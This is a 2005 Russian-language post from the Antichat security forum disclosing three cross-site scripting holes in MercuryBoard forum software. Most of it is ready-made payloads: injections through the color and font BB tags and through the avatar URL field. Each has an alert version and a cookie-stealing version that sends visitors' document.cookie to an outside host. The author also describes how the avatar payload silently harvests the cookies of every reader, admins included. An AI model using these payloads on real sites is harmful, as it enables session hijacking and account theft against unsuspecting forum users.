ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Еще парочка xss в MercuryBoard
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Еще парочка xss в MercuryBoard
  #1  
Старый 10.04.2005, 18:58
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355

Репутация: 241
По умолчанию Еще парочка xss в MercuryBoard
Несколько уязвимостей xss в форуме MercuryBoard
(2 ПРИМИТИВНЕЙШИХ в bb тегах и 1 в аватарке)

1 из них заключается в плохой защищенности bb тега color, что дает нам право внедрить в него xss иньекцию.
Итак, вот сплойт:
Для алерта:
Код:
 [color=black;background:url(javascript:alert(document.cookie))]123[/color]
И для сниффа:
Код:
[color=black;background:url(javascript:img.src=&#34http://antichat.ru/cgi-bin/s.jpg?&#34+document.cookie);]123[/color]
2 уязвимость заключается в плохой защищенности bb тега font, что также дает возможность внедрить в его тело вредоносный код.
Для алерта:
Код:
[font=courier;background:url(javascript:alert(document.cookie))]123[/font]
И для сниффа:
Код:
[font=courier;background:url(javascript:img.src=&#34http://antichat.ru/cgi-bin/s.jpg?&#34+document.cookie)]123[/font]
3 дыра самая интересная и самая матерая, это уязвимость в аватарке. Мы можем внедрить в адресс аватара свой сплойт, при этом со стороны это не будет никак выкупатся=), а сплойт тем временем будет собирать кукисы всех, кто будет читать ваши посты, или кто заглянет к вам в личный кабинет. При этом, при просмотре свойств аватара, пользователь не увидит ничего подозрительного, так как, в адресе будет указано http://smailiki.ru/smile/1.gif/ . Как видим, слеш в конце нам все поганит, это проявляется из-за экранирования знака (') ,бек слешем. Но с этим ничего не поделаешь, и хоть аватарка отображатся не будет, у обычных пользователей, да даже у админов, имхо это вызовет мало подозрений. Пускай думают что глюки.=)
Чуть не забыл, вот и сплойт:
Код:
http://smailiki.ru/smile/1.gif'style=background:url(javascript:img.src=&#34http://antichat.ru/cgi-bin/s.jpg?&#34+document.cookie;);1.gif
ну и как уже стало традицией, алерт:
Код:
http://smailiki.ru/smile/1.gif'style=background:url(javascript:alert(document.cookie));1.gif
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ